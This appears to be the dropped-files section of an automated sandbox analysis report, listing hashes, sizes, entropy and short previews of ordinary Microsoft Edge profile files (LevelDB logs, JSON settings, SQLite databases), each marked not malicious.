                                                                                                                                                                                                                                                                                    SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                    MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                    SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                    SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                    SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.156544936296632
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdZ+q2P923oH+Tcwt8NIFUt8VRd1Zmw+VRdZVkwO923oH+Tcwt8+eLJ:Bv4YebpFUt8j/+55LYebqJ
                                                                                                                                                                                                                                                                                    MD5:0E7231C5DEB6005328411FAB3A99E79A
                                                                                                                                                                                                                                                                                    SHA1:D997ED40FC385FE49B97CB2469A77F940865E6BE
                                                                                                                                                                                                                                                                                    SHA-256:AF6B4B36F8CD646ED6DD0220DEECEB87C500D1F5F9C067928D91595255E65AE7
                                                                                                                                                                                                                                                                                    SHA-512:DB1BFC80CDCD5DB084F637E700951671FD5FEDA59E5ADA35A8524DFBC4ABEB17BA99960D023A71DB922F374D7024A9FCF82DA280EF6A53BAD658509853136AB9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.772 1fe8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/23-00:57:48.772 1fe8 Recovering log #3.2024/12/23-00:57:48.772 1fe8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.156544936296632
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdZ+q2P923oH+Tcwt8NIFUt8VRd1Zmw+VRdZVkwO923oH+Tcwt8+eLJ:Bv4YebpFUt8j/+55LYebqJ
                                                                                                                                                                                                                                                                                    MD5:0E7231C5DEB6005328411FAB3A99E79A
                                                                                                                                                                                                                                                                                    SHA1:D997ED40FC385FE49B97CB2469A77F940865E6BE
                                                                                                                                                                                                                                                                                    SHA-256:AF6B4B36F8CD646ED6DD0220DEECEB87C500D1F5F9C067928D91595255E65AE7
                                                                                                                                                                                                                                                                                    SHA-512:DB1BFC80CDCD5DB084F637E700951671FD5FEDA59E5ADA35A8524DFBC4ABEB17BA99960D023A71DB922F374D7024A9FCF82DA280EF6A53BAD658509853136AB9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.772 1fe8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/23-00:57:48.772 1fe8 Recovering log #3.2024/12/23-00:57:48.772 1fe8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):429
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                    MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                    SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                    SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                    SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):8720
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.21861961848037048
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:bBRtFlljq7A/mhWJFuQ3yy7IOWUL/cdweytllrE9SFcTp4AGbNCV9RUIGR:9K75fO6d0Xi99pEYkR
                                                                                                                                                                                                                                                                                    MD5:B801646633D31D432C10068055658FE7
                                                                                                                                                                                                                                                                                    SHA1:13E8F0D5706627F2B31F8599C03927A837DC9A85
                                                                                                                                                                                                                                                                                    SHA-256:2658CA8D124E44DDDA32A42BE4E471371209FDCFB52CC4B1DD3E2F22FB025C7B
                                                                                                                                                                                                                                                                                    SHA-512:D3B0E5561BB2DDF6375CF97410D67FE3E2918BB44C74D143D5F602A624DAAAE9BFA492A041CF5C4A44D2DA1E386B6B1BD2AC5BF3CD875B013881CB7DD68FA43E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6477372942424546
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:aj9P0xxP/KbtfjlgQkQerGcg773pL9hCgam6ItRKToaAu:adwP/ylge2pg7Pv9RKcC
                                                                                                                                                                                                                                                                                    MD5:7285C7358A1CFD7685046CB8F4899A3E
                                                                                                                                                                                                                                                                                    SHA1:2B993CD42C9BE128E59F7CCF675ADB34ADAFDE65
                                                                                                                                                                                                                                                                                    SHA-256:203B1D6301FB7C5259A5C2EF3C7045E261A95DFFCD278F85E424EF7630CC2AC9
                                                                                                                                                                                                                                                                                    SHA-512:914EF7CB273B9535FE3D662C71C91AC5CBA4F3BE49326A072D0F92BFF7224772EB5EF340919BDFE1BC82A5BD089CB0DDBA06188FE345D4AC25A7014E839D661A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):408
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.27179308171188
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:FPv4Yeb8rcHEZrELFUt8ar/+ah5LYeb8rcHEZrEZSJ:Z4Yeb8nZrExg8kLYeb8nZrEZe
                                                                                                                                                                                                                                                                                    MD5:DFCB1929AF75D88FFAB69607016E0132
                                                                                                                                                                                                                                                                                    SHA1:26313B423430A69B4CB4A6E204CD6E0BD29FF88A
                                                                                                                                                                                                                                                                                    SHA-256:8AD5C11CDCF5341F5D953AC096515FF84D6181F19E6B3D8F5A60DFC70DD21115
                                                                                                                                                                                                                                                                                    SHA-512:F5F2B50B91556ADCC160C13E9537209304891AFFCFB60C967D7800E89923B5CA91E0F28D0DA7CC93F230A9A3D731993499FE82BA932B0C167F1DFCE91A9EA357
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:52.045 1fe8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/23-00:57:52.046 1fe8 Recovering log #3.2024/12/23-00:57:52.046 1fe8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1660
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.652458346727815
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:sZgmvaSTXZSMpV03Sx4/syhat3E4X7AHHk2GJ348ylsT:sHvaSLFpe/dP8osT
                                                                                                                                                                                                                                                                                    MD5:982F4E37F81D3FBBF19A8EE6AECD4F3D
                                                                                                                                                                                                                                                                                    SHA1:3495BE0AC1568A4EBF82292F2F27D337B245A027
                                                                                                                                                                                                                                                                                    SHA-256:1E0569283CFE254F750131CCB8E83445A8D01C67915CEC470EF32780CD576226
                                                                                                                                                                                                                                                                                    SHA-512:5F65B3EEAFAB580877746A34822B4DFA23231CBB6997B90AE9EDF2AADDED0280AB541BD77545E62DB84BA86CC9A61EF0F977840E658DF4E9232E225CBC37DC06
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.3...................VERSION.1..META:https://ntp.msn.com..............!_https://ntp.msn.com..LastKnownPV..1734933482494.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734933483469.._https://ntp.msn.com..MUID!.1527A764E6A86BDB2DE6B23AE7AF6A4B.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734933482597,"schedule":[-1,-1,30,36,33,-1,-1],"scheduleFixed":[-1,-1,30,36,33,-1,-1],"simpleSchedule":[37,24,46,36,31,16,10]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734933482460.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Mon Dec 23 2024 00:58:02 GMT-0500 (Eastern Standa
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.143917806489423
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdI1Iq2P923oH+Tcwt8a2jMGIFUt8VRdcZZmw+VRd8FU1zkwO923oH+Tcwt8a23:L1Iv4Yeb8EFUt8mZ/+CFe5LYeb8bJ
                                                                                                                                                                                                                                                                                    MD5:3F98390B57C2556A5E5B7ABA7BAE50C5
                                                                                                                                                                                                                                                                                    SHA1:D9AF74BB8E166294D04D192F598E3F4D623DBE7D
                                                                                                                                                                                                                                                                                    SHA-256:CEDE11797D513AA5C69DF81931DC0C1454CF5A90D26A83FECD80A96579561B0A
                                                                                                                                                                                                                                                                                    SHA-512:CD94B32F31A8F97CC682EEA29CCB0E801E2899769599C108439C76DA67F8C01A04454804E7474E86556B505E8DAC50955180FAD129E8570821C75135D4998250
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.044 1a10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/23-00:57:48.046 1a10 Recovering log #3.2024/12/23-00:57:48.049 1a10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):1664
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.33106012928878
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381999071743606","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381999076776126","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379500679485632","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymizatio
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1419
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7852848399253616
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2145749921937887
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBTM7:uIEumQv8m1ccnvS68qYdv
                                                                                                                                                                                                                                                                                    MD5:D1B6B2EB9D31FED5D8B44795724C8476
                                                                                                                                                                                                                                                                                    SHA1:1E201D41AD5AB5DB200EF7E5B55C1B1F78060B0C
                                                                                                                                                                                                                                                                                    SHA-256:B242BE58233C0F39DFD04CCBC25B9D618F4BE70BA62F13250FA61B06190BE250
                                                                                                                                                                                                                                                                                    SHA-512:5DF3C764B6251267E8C4CC2A4DFC4B48444C13BC4D5C5C797556A5D01A1FD50C3130DBCEE8A11554EF64F2B0EBDCFF12C0A5FD0C5D90C5971EDC81BD16D7FBE1
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                    MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                    SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                    SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
